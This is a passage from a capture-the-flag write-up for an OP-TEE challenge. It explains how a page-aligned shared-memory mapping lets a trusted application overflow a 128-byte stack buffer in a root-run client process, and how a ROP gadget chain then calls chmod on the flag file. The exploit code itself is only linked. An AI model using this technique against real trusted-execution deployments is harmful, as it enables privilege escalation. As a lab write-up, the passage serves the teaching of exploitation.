103 | ![070b86d520221b246afa7a1b2598b79](https://s2.loli.net/2023/05/03/fnVMyxIpuTtvwAg.png) 104 | 105 | When the `d3_core_get_sec_file_info` function is called, the pointer to store the file information in the CA will be passed to the TA in the way of `TEEC_MEMREF_TEMP_INPUT`. This pointer references the CA's buffer on the stack. 106 | 107 | ![image-20230503004650985](https://s2.loli.net/2023/05/03/y7AS58Qx3Mq1EiI.png) 108 | 109 | ![12c883cc1a6d7728775b01700b41b2f](https://s2.loli.net/2023/05/03/ev7FwSyLDkNKQ1U.png) 110 | 111 | ![617a2c40f860058a6151024fff90ab7](https://s2.loli.net/2023/05/03/3muXdLSOQcRKB4r.png) 112 | 113 | ![image-20230503011850677](https://s2.loli.net/2023/05/03/WPa7jyZzUnmk81L.png) 114 | 115 | The `TEEC_MEMREF_TEMP_INPUT` type parameter of CA is not copied but mapped when passed to TA. This mapping is usually mapped in a **page-aligned** manner, which means that it is not only the data of the size specified in `tmpref.size` that is mapped to the TA address space, but also other data that is located in the same page. As shown in the figure, it represents the address space of a TA, and the marked position is the buffer parameter mapped into the TA. 116 | 117 | ![image-20230503005412695](https://s2.loli.net/2023/05/03/Uil428yKJpbHnQx.png) 118 | 119 | In this challenge, the extra data we write to the buffer using `d3_core_get_sec_file_info` will cause a **stack overflow** in the CA, because the buffer for storing the file name in the CA is only 128 bytes, as long as the file content is large enough, we can overwrite it to the return address in the CA. Since the `optee_d3_trusted_core` process works with **root privileges**, hijacking its control flow can find a way to obtain the content of `/flag.txt` with the permission flag of `400`. Note that during buffer overflow, `/api/secfs/file/update` can be used to pre-occupy a larger filename size, thereby bypassing the limitation that the content after the null byte cannot be copied to the buffer. 120 | 121 | With the help of the statically compiled `gdbserver`, we can quickly determine the stack location that can control the return address. For functions with buffer variables, aarch64 will put the return address on the top of the stack to prevent it from being overwritten. What we overwrite is actually the return address of the upper-level function. With the help of the **almighty gadget** in aarch64 ELF, we can control the `chmod` function to set the permission of `/flag.txt` to `766`, and then read the flag content directly from HTTPd. 122 | 123 | ![image-20230503011343736](https://s2.loli.net/2023/05/03/CchYHOqt46T3IGB.png) 124 | 125 | ![image-20230503011458586](https://s2.loli.net/2023/05/03/3D5JnBAPIoC8ptU.png) 126 | 127 | ### Exploit 128 | 129 | See code in [exp.py](https://github.com/yikesoftware/d3ctf-2022-pwn-d3TrustedHTTPd/blob/main/exp.py) 130 | 131 | --------------------------------------------------------------------------------